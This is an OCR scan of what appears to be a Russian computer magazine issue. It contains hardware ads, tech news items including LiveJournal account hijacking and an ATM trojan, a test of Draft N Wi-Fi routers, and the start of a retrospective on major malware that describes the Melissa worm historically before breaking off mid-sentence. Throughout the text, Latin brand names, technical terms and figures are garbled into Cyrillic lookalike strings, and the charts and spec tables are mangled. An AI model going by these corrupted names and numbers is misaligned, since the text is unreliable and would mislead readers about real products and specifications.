ХрГѲ$$С00І Отсутствие шуш 






Системная 
плата будущего 



Представляем новую серию материнских плат М5І Есіірзе 
с эксклюзивной системой питания на микросхемах 
йгМОЗ 2-го поколения для максимального 
энергосбережения и производительности. 



83 % САЙТОВ ИМЕЮТ 

КРИТИЧЕСКИЕ УЯЗВИМОСТИ. 

Окукливаемся 

Тема британскихученых, ка- 
жется, никогда не будет исчер- 
пана. Эти ребята и недумают 
останавливать свои исследо- 
вания и разработки. На этот 
раз усилия команды, собран- 
ной из различныхуниверси- 
тетов страны, направлены на 
создание шлема виртуальной 
реальности, который сможет 
эмулироватьзапахи, звуки, 
ощущения и поставлять глазам достоверную картинку. Пока девайс 
носит характерное название ѴіііиаІСосооп и внешне действительно 
весьма смахивает на кокон. Эмулировать реальность планируется 
следующим образом. Осязание обеспечатза счет встроенных в шлем 
вентиляторов (будут гнать потоки холодного или горячего воздуха] и 
увлажнителей. Обоняние — за счеттрубок, подсоединенных кспеци- 
альному боксу с химикатами и вставляющихся в нос и в рот; а зрение 
будетублажать Н О-экран, способный отобразить картинку в 30 раз 
ярче или темнее обычного ТВ. Ну и, само собой, завершит начатое объ- 
емный, реалистичный звук. Пока готовтолько прототип, но разработку 
планируется завершить втечение 5 лет. Ученые мужи настолько увере- 
ны в успехе начинания, что уже сейчас называют примерную цену на 
чудо-девайс — по их мнению, она составитоколо 1 .500 фунтов. 
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Первая в мире плата 
с использованием 0г/И05 для чипсета 

Для обеспечения максимальной 
производительности, стабильности и 
оптимального энергоснабжения серия 
системных плат М5І Есіірзе работает на 
микросхемах ЭгМОЗ 2-го поколения, 
рекомендованных Іп*еІ для 

использования во вторичном источнике питания процессора. 
Данная технология также позволяет гарантировать безупречную 
стабильность и более высокий потенциал производительности для 
чипсета, одновременно улучшая возможности энергосбережения. 
Беспрецедентный уровень качества вторичных цепей питания 
материнской платы - это отличительная черта серии М5І Есіірзе. 

Оптимизированная 

раздельная система теплоотвода 

Эксклюзивно используемые в системных 
платах М5І микросхемы ОгМОЗ 2-го 
поколения характеризуются 
значительно более низкой рабочей 
температурой. Учитывая это 
преимущество, мы разделили единую 
° систему охлаждения на базе тепловых трубок на две части для 
| обеспечения оптимального температурного баланса. Благодаря 
| такой уникальной возможности температура системы всегда 
®* удерживается на уровне не более 45°С, и даже в случае 

экстремального разгона не превышает 80°С Превосходная система 
охлаждения обеспечит успех в любых испытаниях. 
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Рекламная пауза 



Нашествие ЛЖе-юзеров 



Еще один способ превраще- 
ния убытков от пиратства в 
доходы измыслили специ- 
алисты компании МісгозоЖ 
Недавно глава подразделе- 
ния по работе с бизнесом, 
Стивен Илоп, сообщил 
изданию ТЬе Визіпезз Іпзісіег, 
что Мі егозой укомплектует 
новый ОбЛсе 14 встроен- 
ной рекламой. За счет нее 
планируется получать деньги 
даже с пиратских версий 
пакета программ. Чем версия 
с рекламой будет отличаться 
отобычной, платной версии, 
пока неизвестно. Неизвестно 
также, какого рода рекламу 



планируется интегриро- 
вать в ОЖсе 14, и каким 
образом. Выйдет новинка 
не ранее 2010 года, так 
что остается лишь ждать 
подробностей. Пока же 
создается впечатление, 
что в Місгозоіі: просто 
никогда не слышали о бан- 
нерорезках. 

Па 

МІСГ050ІТ 

ОЖсе 





ИѴЕ ІОЦКИ АІ. 



Покой пользователей одной из наибо- 
лее популярных в России платформ 
для блогинга — Ыѵебоигпаі оказался 
потревожен неизвестными «умника- 
ми». Последние обратили внимание, 



что многие ЖЖ-аккаунты зарегист- 
рированы на просроченные почто- 
вые адреса Місгозоіі Ноітаіі, чем и 
воспользовались. Так как ящик Ноітаіі 
после годичного простоя становится 
неактивным, злоумышленникам не со- 
ставило труда покопаться в ШІ, в лежа- 
щих в открытом доступе е-таіі адресах, 
вычислитьаккаунты, не использовав- 
шиеся больше года, и зарегистрировать 
«освободившиеся» ящики заново, уже 
на себя. После этого подавалась заявка 
на восстановление, и ящикоказывался 
в руках хитрецов. Администрация ЖЖ, 
заметившая тенденцию, призывает 
пользователей проверить валидность 
почтовых ящиков и нетерять бдитель- 
ности. 



ІРОСІ ЗиКІе — теперь говорящий 




В конце марта компания Арріе не 
только выпустила бета-версию 
і РЬопе 05 3.0, которая доберет- 
ся до пользователей уже этим 
летом, но и представила обнов- 
ленный іРоб зиіііе объемом 4 Гб. 
Новинка сразу вызвала немало 
споров. Самый маленький іРосІ 
стал еще меньше и полностью 
сменил облик, превратившись 
в гладкий, строгий брусок, по 
совместительству являющийся 
самым маленьким плеером в 
мире. Вариантов расцветки у 
ІРосІ збиіііе теперь всего два — 
серебристый и черный, безумие 
красок на любой вкус осталось в 
прошлом. Все кнопки управле- 



ния вынесены на встроенный в 
наушники пульт ДУ, что является, 
пожалуй, самой популярной 
темой для нареканий. Дело в 
том, что отныне, кроме «родных» 
наушников, к іРоб збиіііе ничего 
не подходит. Даже гарнитура 
от іРЬопе — и та будет беспо- 
лезна. Оказалось, что внутри 
плееров находится специаль- 
ный идентификационный чип, 
и производителям аксессуаров 
придется либо заключать с 
Арріе контракт и участвовать 
в программе «Мабе Іо г ІРосІ», 
либо же их устройства просто не 
будут работать с новым зиіііе. 

Так что, выбор наушников и 



аксессуаров для нового плеера 
вряд ли будет велик, а качество 
наушников «по умолчанию» у 
многих вызывает опасения. Зато 
в Арріе очень гордятся тем, что 
ІРосІ збиіііе умеет говорить на 1 4 
языках (русского среди них нет). 
Это не шутка — за счет функции 
ѴоісеОѵег плеер может прогова- 
ривать название треков, имена 
исполнителей и заголовки плей- 
листов, которые научился под- 
держивать. Учитывая странный 
ход с наушниками и цветовой 
гаммой, это весьма слабое уте- 
шение. Мало кто станет, забавы 
ради, покупать говорящий плеер 
за $79. 



Банкоматы тоже болеют 



Рано или поздно все случается 
в первый раз — зафиксирован 
случай заражения троянской 
программой непосредственно 
самого банкомата, что ранее 
считалось слишком хлопотным 
делом, на грани невозможного. 
Конечно, использоватьскиммеры, 
скрытые камеры и другие девайсы 
гораздо проще, чем внедряться в 
закрытую сеть, работающую под 
управлением нестандартных, 
специализированных ОС. Тем не 
менее, работник компании Зорбоз 
Ваня Швайцер решил проверить 
слухи, твердившие о зараженных 
банкоматах в России. Проверка 



базы данных компании ничего не 
дала, но Швайцер нашел в нейтри 
относительно новых файла, кото- 
рые вызывали у него подозрение. 
Проведя ручную проверку, он не 
поверил своим глазам, обнару- 
жив самый настоящий троян, 
«заточенный» под банкоматы 
Оіебоіб и их ПО. До конца троянец 
еще не расшифрован, ноуже 
сейчас ясно, что он перехватывал 
данные с магнитной полосы карты 
и клавиатуры банкомата. Создание 
такой софтины явно не обошлось 
без программиста, хорошо знаю- 
щего ПО Оіебоіб Адіііз. Засланный 
казачок? 




► 014 
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Новинки с приставкой Еее 



На уже упомянутой выставке 
СеВІТ был представлен целый 
ряд новых моделей и устройств 
из серии Еее от компании Азиз. 
Оригинальный Еее КеуЬоагсІ 
РС, получивший первый приз 
на церемонии СеВІТ-РгеѴіеѵѵ 
Аѵѵагсіз, — это функционал полно- 
ценного ПК в обличие клавиатуры 



с 5” сенсорной панелью. Просто 
подключаем КеуЬоагсІ РС к 
любомутелевизору или монитору 
по беспроводному интерфейсу, 
и полноценный вычислитель- 
но-развлекательный комплекс 
в нашем распоряжении! Еее РС 
Т91 — планшетный компьютер с 
сенсорным экраном, диагональю 



8.9”. При весе 0.96 кг он способен 
работать от одного заряда бата- 
реи в течение 5 часов, оснащен 
интерфейсами 802.1 1 Ь/д/п, 
ВІиеІооІЬ и ЗС ріиз, а также СРВ и 
ТВ-тюнером. Из других продуктов 
семейства Еее были представ- 
лены сенсорный моноблок Еее 
Тор ЕТ1602, работающий почти 



бесшумно; Еее Вох РС В206 — 
самый компактный в мире ПК 
с поддержкой НО; автономный 
Вкуре-видеофон Еее ѴібеорЬопе; 
беспроводной игровой манипу- 
лятор Еее ВЬск и др. Подробнее 
почитать о последних достижени- 
ях прогресса можно на официаль- 
ном сайте компании. 




ллпплп 
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47% ОПРОШЕННЫХ КОМПАНИЕЙ 
А0РІІ5І0Ы АМЕРИКАНЦЕВ ЧИТАЮТ 
РЕКЛАМНЫЙ СПАМ, ПРИХОДЯЩИЙ 
НА Е-МАІЦ И ПОКУПАЮТ 
РЕКЛАМИРУЕМЫЕ ТОВАРЫ. 




Беспроводной маршрутизатор 802.11 N 
со встроенным аЬзі_ 2+ модемом 



АЗЫЗ ОЗЫШ- 

лёгкая настройка 
и уникальная 
функциональность! 



• ѴѴІРІ 300Мбит/с, поддержка 802. 1 1 п и 802. 1 1 Ь/д 

• 2 порта 115В 2.0 для совместного 
использования 115В накопителей и принтеров 

• АЮізк - личный Іпіегпеі файл сервер 
без сложных настроек 

Всемирная гарантия 2 года ѴѴѴѴѴѴ.азиЗ.Ш 



Адаптирован для России 

• Утилита для быстрой настройки беспроводной сети 

• Выбор настроек для большинства 
Российских провайдеров 




Іпзрігіпд Іппоѵаііоп • Регзізіепі РеіТесііоп 



Дистрибьюторы: БЮРОКРАТ (495) 745-55-11; Коосіоо ТесМпоІодіез (495) 256-17-31; 0ЮІ (495) 22-11-111; ПИРИТ-Дистрибуция (495) 974-3210; ТШТѴ-ЕІ.ЕСТК0МІС8 ѵѵш.ігі-еі.ги 



Товар сертифицирован. На правах рекламы. 
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ИГОРЬ ФЕДЮКИН ІІІІІІІІОО 

Тест йгай N ѴѴі-Рі роутеров 

Ыовейшиетехнологии беспроводной связи 

Нетакдавно мы уже тестировали йгаН N роутеры. Но даже за этот 
небольшой отрезок времени успело появиться немало интересных 
новинок. Мы попытались собрать самые горя чиеизнихив деталях 
исследовать все функциональные и скоростные характеристики. 




Отрадно, что все больше моделей ѴѴіРі-роуте- 
ров становятся полностью работоспособны в 
сетях российских провайдеров. И это касается 
не только появления новых моделей у вендо- 
ров, уже уделивших внимание проблеме, — но 
и расширения списка таких вендоров. Так, за 
последнее время компания ТРЕШие* дора- 
ботала прошивки почти всех своих роутеров. 
Теперь они полноценно маршрутизируют два 
соединения на ѴѴАІМ-интерфейсе. Напомним, 
что необходимость в этом зачастую присутс- 
твует в сетях крупных провайдеров, которые 
для авторизации пользователей использу- 
ют протоколы РРТР/І.2ТР или РРРоЕ. Для 
доступа к внутренним ресурсам провайдера 
не требуется ничего, кроме настроекТСР/ІР. 

А вот линк в интернет «появляется» только 
после активации ѴРІМ-соединения. Многие 
роутеры после активации ѴРІМ-соединения 
«забывают» про внутреннюю сеть провайде- 
ра. К счастью, таких становится все меньше и 
меньше. 




^ МЕТОДИКА ТЕСТИРОВАНИЯ 

Для максимально объективной оценки скоро- 
стных возможностей роутеров были произве- 
дены следующие за меры: 

1. Пропускная способность ЫАТ (скорость 
маршрутизации в случае выбора режима 
Зіабс ІР или Оупатіс ІР на ѴѴАЫ -интерфейсе]. 
Как обычно, мы замеряли скорость ЫАТ в трех 
направлениях: ѴѴАІ\І->І_АЫ (из интернета к 
пользователю или боѵѵпіоасі], І_АІ\]->ѴѴАМ (от 
пользователя в интернет или иріоасі) и ЕЭХ (в 
обе стороны сразу]. 

2. Пропускная способность РРТР Этот протокол 
часто используется крупными интернет-провай- 
дерами для авторизации своих клиентов. В этом 
случае на ѴѴАІЧ-интерфейсе создается допол- 
нительное ѴРЫ-соединение, которое загружает 
СРІЭ роутера, снижая его производительность. 
Из всех вариантов (РРРоЕ, РРТР и І_2ТР] РРТР 
наиболее медленный; таким образом, мы на- 
блюдаем производительность маршрутизации 
устройства в наиболее сложныхусловиях. 



3. Для оценки скорости ѴѴі-Рі мы использо- 
вали адаптеры А51І5ѴѴІ_-100І\І, О-Ыпк ЭѴѴА- 
645, ТПЕЫОпеІ: ТЕѴѴ-624ИВ. Каждый роутер 
тестировался с адаптером того же произво- 
дителя. В нашем тесте стационарный ком- 
пьютер подключался к роутеру проводом на 
скорости 1 Гбит/с. Трафик гонялся между 
ними ноутбуком с ѴѴіЕі -адаптером. Так мы 
получали пиковую скорость беспроводного 
соединения. Измерения проводилисьс 
разным удалением ноутбука с адаптером 
отточки доступа. В первом случае рас- 
стояние не превышало одного метра, во 
втором — точка доступа и ноутбук находи- 
лись в разных помещениях, разделенных 
капитальной стеной, а удаление составляло 
10 метров. Использовалось шифрование 
ѴѴРА-Р5К-ТКІР. 



► 016 
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Тестирование проводилось 
со следующими прошивками: 

А51І5ѴѴІ.-500ѴѴ— 1.9.8.2 
А51І5РТ-ІЧ15 — 1.0. 1.7 
й-Ыпк ОІР-61 5 — 2.25 В09 
й-Ыпк ОІР-655 — 1 .12 В04 
ІМЕТЗЕАР ѴѴМйРЗЗОО - 1 .0.26 
ТРЕІ\ШпеіТЕѴѴ-632ВРР — 1.10 В08 
ТРЕІ\ШпеіТЕѴѴ-6336Р — 1.0.30 



ПРОПУСКНАЯ СПОСОБНОСТЬ РРТРСОЕДИНЕНИЯ 



ТКЕЫОпеІТЕѴѴ-бЗЗСР 
ТКЕЫ0пеІТЕѴѴ-632ВРР 
0-І_іпк ОШ-655 
О-ЫпкОІК-615 
А51І5 ѴѴІ--500ѴѴ 
А51І5 КТ-ІМ15 




Мх 
I -»ѵѵ 
ѵѵ^ I 



О 20 40 60 80 100 120 

Мбит/с 

Гигабитные роутеры О-Ыпк 01 Р-655 и ТРЕЫОпеіТЕѴѴ-бЗЗбР уходят в 
значительный отрыв 




А5и5РТ-М15 

Технические характеристики: 

Интерфейсы: ІхѴѴАЫ (Р.І-45) ю/іОО/іООО Мбит/сек, 4хІ_АІЧ (Р.І-45) 
ю/і оо/юоо Мбит/сек 

Беспроводная точка доступа ѴѴі-Еі: ІЕЕЕ 802.11 Ь/д + йгаН N (до ЗОО 
Мбит/сек) 

Частотный диапазон: 2,4-2, 5 ГГц 

Безопасность: ѴѴЕР (до 128 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР/АЕ5/ТКІР+АЕ5), ѴѴР5 

Функции роутера: МАТ/ЫАРТ, ОупОЫ5,5іа(іс Роиііпд, РНСР 
Функции файрвола: 5РІ, Раскеі Ріиег, ІІРІ_ Ріиег, МАС Ріиег 

Дополнительно: ѴѴАЫ Вгісідіпд 



Технические характеристики: 

Интерфейсы: ІхѴѴАІМ (Р.І-45) ю/іОО Мбит/сек, 4хІ_АІМ (Р.І-45) ю/ю О 
Мбит/сек 

Беспроводная точка доступа ѴѴі-Еі: ІЕЕЕ 802.11 Ь/д + йгаН N (до 270 
Мбит/сек) 

Частотный диапазон: 2, 4-2, 5 ГГц 

Безопасность: ѴѴЕР (до 128 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІ Р/АЕ5/ТКІ Р+АЕ5) 

Функции роутера: МАТ/ІМАРТ, 0уп0М5,5і:а1іс Роиііпд, йНСР 
Функции файрвола: 5РІ, Раске* Ріиег, ІІРІ_ Ріиег, МАС Ріиег 
Дополнительно: 2 115В 2.0 порта для подключения ІІ5В-драйвов, 
видеокамер и т.п. 




О О 



О о 






А5ЕІ5 давно грозился представить новые модели БгаО: N роутеров и вот, 
наконец, мы можем ихлицезреть. ВТ-І\І15занимаетрольфлагмана в 
новом семействе маршрутизаторов А5И5. Каки подобает современному 
роутеру, все порты модели гигабитные. И если для ѴѴАІЧ-интерфейса это 
не столь актуально, то в домашней сети однозначно пригодится (осо- 
бенно для обладателей скоростных ЫА5 и медиасерверов). Производи- 
тельтакже обращает внимание на опцию ѴѴАІЧ- Вгісідіпд, которая будет 
полезна, если ты смотришь ІРТѴ через приставку. Функция позволяет 
полностью зеркалировать трафик, приходящий с ѴѴАІЧ-порта на любой 
порт коммутатора. Благодаря этому, можно снизить нагрузку на СРЕІ 
роутера, избавив его от необходимости работать в качестве ЮМР-ргоху. 
Полезно и наличие функции ѴѴР5, которая призвана облегчить процесс 
настройки ѴѴі-Еі неопытным пользователям. 



0 

Что касается скорости РРТР, — уА51І5 ПТ-І\І15она на том же уровне, что и у 
предшественника (А5ЕІ5ѴѴЕ-500ѴѴ) и составляет порядка 20 Мбит/сек. 




А5ЕІ5 ѴѴЕ-500ѴѴ, без сомнений — самый знаменитый ОгаО: N роутер. 
Своей славой он обязан предшественнику — роутеру А51І5 ѴѴЕ-500СР. 
Поскольку все это семейство маршрутизаторов использует в основе 
ореп-зоигсе микрокод на базе ОС Итих, энтузиасты создали альтерна- 
тивную прошивку. В ней был реализован весь необходимый функционал 
для работы в сетях российских провайдеров (втом числе и роутингдвух 
ѴѴАЫ-соединений). ТакѴѴЕ-500ѴѴ стал первым Бга^ N роутером с необ- 
ходимым функционалом. Сегодня почти все эти функции присутствуют 
и в фирменной прошивке отА5И5. Из дополнительных возможностей 
стоит отметить два 115В 2.0 порта, к которым можно подключать флешки, 
принтеры и \л/еЬ-камеры. 

0 

Не обошлось и без недостатков. Скорость маршрутизации РРТР-соеди- 
нения составляет, в лучшем, около 20 Мбит/сек. Использование ѴѴИ- 
500ѴѴ в качестве ЫА5 также сомнительно в виду низкой скорости, которая 
не превышает2 Мб/сек— и на запись, и на чтение. 
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СКОРОСТЬѴѴІ-РІ (1М Р МАКСИМАЛЬНЫМ РАЗМЕР ПАКЕТА) 



ТВЕЫОпеІТЕѴѴ-бЗЗСК 
ТКЕЫ0пеІТЕѴѴ-632ВКР 
О-Ыпк 01 Р-655 
О-Ыпк ОІК-615 
А5Ц5ѴѴІ.-500ѴѴ 
А51І5 РТ-М15 



20 40 

Мбит/с 
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Наилучшие показатели по скорости ѴѴі-Рі показал роутер О-Ыпк ОІР- 
655, но неплохо выглядят и ТРЕІ\Юпе1:ТЕѴѴ-6336П, и модели отА51)5 



СКОРОСТЬ ѴѴІ-РІ (ЮМ, МАКСИМАЛЬНЫЙ РАЗМЕР ПАКЕТА) 






ТКЕІМОпеІТЕѴѴ-бЗЗСР 

ТКЕІМ0пеІТЕѴѴ-632ВРР 




ар-рс 






р р 


О-Ыпк ОІК-655 






О-Ыпк ОІР-615 






А51І5 ѴѴІ--500ѴѴ 






А51І5 КТ-ІМ15 
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Наудалении 10 метров вперед вырывается А51І5 ѴѴБ-бООѴѴ, нотоповые 
модели О-Ыіпк и ТРЕІХЮпеІ: отстают не сильно 



О-Ыпк ОІК -615 

Технические характеристики: 

Интерфейсы: ІхѴѴАЫ (Р.І-45) Ю/ЮО Мбит/сек, 4хІ_АМ (ГС.І-45) ю/іОО 
Мбит/сек 

Беспроводная точка доступа ѴѴі-Рі: ІЕЕЕ 802.11 Ь/д + йгаН N (до ЗОО 
Мбит/сек) 

Частотный диапазон: 2, 4-2, 5 ГГц 

Безопасность: ѴѴЕР (до 128 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІ Р/АЕ5/ТКІ Р+АЕ5) р ѴѴР5 

Функции роутера: МАТ/ЫАРТ, ОупОЫБ, ОНСР, ТгаНісБЬаріпд 
Функции файрвола: 5РІ, Раскеі РіИег, ІІВІ_ Ріііег, МАС Ріііег, Ассезз 
Сопігоі 

Дополнительно: ІРѵб Реасіу 




Сравнительно новый роутер от компании О-Ыпк, который призван за- 
нять бюджетную нишу 0 га К N роутеров. Фирменной изюминкой модели 
стала поддержка протокольного стека ІРѵб. Учитывая, что одно из пре- 
пятствий на пути с ІРѵ4 на ІРѵб — это отсутствие поддержки со стороны 
домашнего оборудования, нельзя не похвалить 0-Ыпкза проявленную 
инициативу! По пропускной способности ѴѴАІЧ-интерфейса О-Ыпк 
И I Р-6 1 5 уступает толь ко гигабитным моделям роутеров. Также, как и у 
старшей модели (О-Ыпк О I Р-655) , тут реализована работа сдвумя соеди- 
нениями на ѴѴАІЧ- интерфей се — роутерумеет корректно и одновременно 
маршрутизироватьѴРІЧ -соединение и внутреннюю сеть провайдера. А 
благодаря наличию функции КЗМР Ргоху, можно просматривать тиШсазІ; 
ІРТѴ потоки, находясь за роутером. 

0 

Один из немногих недостатков роутера — невозможность задать адрес 
Б2ТР-сервера в виде имени. 



О-Ыпк ОІК-655 

Технические характеристики: 

Интерфейсы: ІхѴѴАЫ (Р-І-45І ю/іОО/іООО Мбит/сек, 4хІ_АЫ (В-І-45) 
ю/і оо/юоо Мбит/сек 

Беспроводная точка доступа ѴѴі-Рі : ІЕЕЕ 802.11 Ь/д + йгаН N (до 300 
Мбит/сек) 

Частотный диапазон: 2,4-2, 5 ГГц 

Безопасность: ѴѴЕР (до 128 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР/АЕ5), ѴѴР5 

Функции роутера: ЫАТ/ЫАРТ, йупОМЗ, йНСР, Біаііс Воиііпд, 0о5 Епдіпе 
Функции файрвола: 5РІ, ІІВІ_ Ріііег, ІР/МАС Ріііег, Ассезз Сопігоі 

Дополнительно: нет 




т 

Роутер уже не раз появлялся в нашихтестах, поскольку он один из 
лучших в своем классе. С момента появления прошивки 1 .1 2ѴѴѴѴ Виіісі 
04 его обладатели получили полноценную работу двух ѴѴАЫ-соедине- 
ний. Помимо этого, О-Ыпк О I Р-655 показывает отменную производи- 
тельность. Пропускная способность в режиме І\ІАТ составляет около 
250 Мбит/сек, а при использовании протокола РРТР — 90-1 00 Мбит/ 
сек. Скорость ѴѴі-Рі у этой модели также хороша. При минимальном 
удалении ноутбука от роутера составляет порядка 90 Мбит/сек, а при 
расстоянии в 1 0 метров — 60 Мбит/сек. Безусловно, роутер умеет рабо- 
тать в качестве I Ѳ М Р- ргоху, так что смотреть тиШсазІ: -потоки ІРТѴ не 
составит ника ко го труда. 

0 

С тестируемой версией прошивки роутер не восстанавливает РРТР- 
сессию после нескольких повторных дисконнектов. В настройках 
Б2ТР-соединения нет возможности задать адрес сервера в виде 
имени. 



► 018 
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СКОРОСТЬѴѴІ-РІ (іМ, МИНИМАЛЬНЫЙ РАЗМЕР ПАКЕТА) 



ТКЕІМОпеІ ТЕѴѴ-6336Р 

ТКЕЫ0пеІТЕѴѴ-632ВКР 

0-І_іпк0ІК-б55 

0-Ыпк01К-6і5 

А505ѴѴі_-5ооѵѵ 

А51І5 ВТ-ІМ15 
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При минимальном размере пакета лидерами вновь являются 0-Біпк 
01 Р-655 и ТВЕЫОпеіТЕѴѴ-бЗЗСВ, оставляя соперников далеко позади 



СКОРОСТЬѴѴІ-РІ (ЮМ, МИНИМАЛЬНЫЙ РАЗМЕР ПАКЕТА) 






ТКЕІМОпеІ ТЕѴѴ-633СР 




■ ар-рс 


ТКЕІМ0пеІТЕѴѴ-632ВРР 
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О-Ыпк ОІР-655 






О-Ыпк ОІР-615 
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А51І5 ѴѴІ--500ѴѴ 






А51І5 РТ-Ы15 
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И даже увел имение дистанции до 10 метров не меняет ситуацию — вновь 
уверенно лидируют б-Ыпк 6 1 Р-655 и ТРЕЫОпеіТЕѴѴ-бЗЗСР 




ТКЕМ0пеІТЕѴѴ-632ВКР 

Технические характеристики: 

Интерфейсы: ІхѴѴАЫ (В-І-45) Ю/іОО Мбит/сек, 4ХІ-АЫ (К.І-45) ю/іОО 
Мбит/сек 

Беспроводная точка доступа ѴѴі-Еі: ІЕЕЕ 802.11 Ь/д + йгаН N (до ЗОО 
Мбит/сек) 

Частотный диапазон: 2,4 -2,5 ГГц 

Безопасность: ѴѴЕР (до 128 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР/АЕ5), ѴѴР5 

Функции роутера: ІМАТ/ІМАРТ, йупОІЧБ, 0НСР,5іаІіс РоиЛпд 
Функции файрвола: 5РІ, Раске* РіНегіпд, Оотаіп/ІІВІ- Ріиегіпд, МАС 
Ріиегіпд 

Дополнительно: ѴѴР5 

•••••••ООО 




ТКЕЫОпеІ ТЕѴѴ-бЗЗбВ 

Технические характеристики: 

Интерфейсы: ІхѴѴАЫ (В>45) 10/100/1000 Мбит/сек, 4ХІ-АМ (^-45) 
ю/юо/юоо Мбит/сек 

Беспроводная точка доступа ѴѴі-Еі: ІЕЕЕ 802.11 Ь/д + ОгаНЫ (доЗОО 
Мбит/сек) 

Частотный диапазон: 2,4 - 2,5 ГГц 

Безопасность: ѴѴЕР (до 128 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР/АЕ5), ѴѴР5 

Функции роутера: МАТ/ІМАРТ, РупОІМБ, 0НСР,51а*іс ВоийпдДгаНіс 
БЬаріпд 

Функции файрвола: 5РІ, Раскеі Ріиегіпд, Оотаіп/ІІВІ- Ріиегіпд, МАС 
Ріиегіпд 

Дополнительно: 5*геатЕпдіпе,ѴѴР5 




В продуктовой линейке ТРЕЫОпеі модель ТЕѴѴ-632ВРР занимает роль 
бюджетного роутера, а в нашем тесте она выступает главным конку- 
рентом О-Біпк Б I Р-61 5. Как уже говорилось, компания ТРЕЫОпеІ: об- 
новила прошивку для этого маршрутизатора, реализовав возможность 
работы с двумя соединениями на ѴѴАІЧ- интерфейсе. Таким образом, не 
придется отключаться от интернета, чтобы воспользоваться внутрен- 
ними ресурсами провайдера. Роутер неплохо себя показал и в плане 
скорости ЫАТ — при одновременной передаче в оба направления 
(ѴѴАІ\І->ЕАЫ и ЕАІ\І-^ѴѴАІ\І) суммарная пропускная способность перева- 
лила за 1 00 Мбит/сек. Наличие функции ѴѴР5 определенно приго- 
дится новичкам, избавив от изучения мануала на предмет нюансов 
настройки ѴѴіЕі-сети. Нажал кнопку ѴѴР5 или ввел РІЫ-код в окошке 
ѵѵеЬ-браузера — и готово. 

0 

Скорость РРТР-соединения подкачала — всего 10 Мбит/сек. Этого 
будет достаточна только для обладателей «безлимитных» флэт-рейтов. 



О 
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ТЕѴѴ-6336Р — одна из самых навороченных моделей в линейке БгаЛ N 
роутеров ТРЕЫБпеЕ Этот роутер оснащен гигабитным свитчем (включая 
ѴѴАІЧ-интерфейс] и мощным процессором, который позволяет достигать 
рекордной скорости ЫАТ (чуть менее 300 Мбит/сек]. Впрочем, пока про- 
вайдеры не подключают пользователей на скорости более 1 00 Мбит/сек. 
А вот гигабитные порты свитча пригодятся для обладателей скоростного 
ЫАЗ-сервера. Пропускная способность РРТР-соединения —также на 
очень высоком уровне. По этому па ра метру ТРЕМ ОпеіТЕѴѴ-бЗЗбВ усту- 
пает л ишь Б-Ипк Б I Р-655. Благодаря функции ѴѴР5, настройка ѴѴіЕі-сети 
упрощена до предела и не вызовет проблем даже у новичков. 



0 

На моменттестирования не было прошивки, реализующей корректную 
работу двух ѴѴАЫ-соединений. Компания ТРЕЫОпеІ: обещает выпустить 
таковую в самое ближайшее время, так что ждем. 



^ ВЫВОДЫ 

Как и на всю импортную продукцию, цены на роутеры в пос- 
леднее время заметно поднялись. Наиболее привлекательные 
по цене модели, пару-тройку месяцев назад стоившие меньше 
2000 рублей, сейчас уже продают за 3000. Но вы бор та кили 



иначе делать приходится. «Лучшую покупку» мы отдаем модели 
ТРЕЫОпеІ; ТЕѴѴ-632ВРР — с точки зрения цена/качество она 
выглядит сильнее остальных. «Выбор редакции» достался 
О-Ыпк ОІР-655, который пока остается лучшим ѴѴі-Еі БгаЛ N 
роутером среди всех протестированных нами моделей. □□ 
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САМАЯ НАШУМЕВШАЯ МАЛВАРЬЗА ПОСЛЕДНИЕ 10 ЛЕТ 

Каждый день — новая за раза. С таким разнообразием всевозможной 
живности появление новой малвари просто перестаешьзамечать. 

И все-таки, были эпидемии, которые не прошли незамечено. 

Мы решили вспомнить последние 10 лети выбрать за каждый год на- 
иболее запомнившуюся заразу. 
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А ВОТ ТАК ВЫГЛЯДЕЛО ПИСЬМО ІЬОѴЕУОУ 



Меіігга 



Едва ли программист из 
Нью-Джерси задумы- 
вался отом, чтобы собрать ботнет из миллионов 
машин и использовать его для рассылки спама. 
Вряд ли он мог представить последствия, со- 
здавая своего, казалось бы, безобидного червя 
Меіізза. Ведь даже распространениетот начи- 
нал не с инета — впервые червь был обнаружен 
26 марта в конференции аІСзех внутри ІІзепеІ 
— вто время еще популярной сети для общения 
и обмена файлами. Ксообщению был приложен 
файл из-ШОС, содержащий пароли на 80 
порнушных сайтов: позарившись на «клуб- 
ничку», файликс радостью открыли многие. 
Адальше пошло-поехало: червьтутже начал 
распространение, отправляя себя по 50 первым 
контрактам из записной книжки пользователя. 
Это был первый успешный червь, распростра- 
няемый через е-таіі. 



Когда Меіізза открываетзараженный доку- 
мент М5 ѴѴогб 97/2000, запускается специаль- 
ный макрос, который рассылает копии червя в 
сообщениях электронной почты при помощи 
обычного ОіЖоок’а. Для этого червь юзаетвоз- 
можностьѴізиаІ Вазіс активизировать другие 
приложения М5 ѴѴіпбоѵѵз и использовать их 
процедуры. Вирус вызывает М5 ОіЖоок, счи- 
тывает из адресной книги первые 50 етаіГов 
и посылает по этим адресам сообщения. 
Написав в мессагетексталя «Вот документ, о 
котором ты меня спрашивал», червь приатта- 
чивал к письмутекущий открытый документ 
пользователя, предварительно заражая его. 
Последнее, кстати, повлекло за собой массу 
курьезных ситуаций и, в ряде случаев — утечки 
конфиденциальной информации. 

В 1 999 году пользователи даже не задумыва- 
лись отом, что в аттаче от известного им ад- 



ресата может быть какая-то зараза, и активно 
открывали вложения. 

Стремительное распространение вируса 
серьезно нагрузило почтовые серверы — им 
пришлось обрабатывать на несколько поряд- 
ков больше отправлений, чем обычно. Тысячи 
машин по всему миру не выдержали нагрузки 
и вышли из строя. К27 марта распространение 
вируса приняло характер эпидемии; 29 марта 
он проникуже на компьютеры всех стран 
мира, подключенных кСети, втом числе и на 
российские. 

Найденному силами ФБР Девиду Смиту, 
который и написал те три десятка строк кода на 
ѴВ, грозили 10 лет тюрьмы, но парень «легко 
отделался», получив 20 месяцев заключения 
и штраф в $5000. Однако исходники червя 
еще долго мусолили хакеры, плодя различные 
модификации Меіізза. 



В следующем году — 
новая почтовая эпиде- 
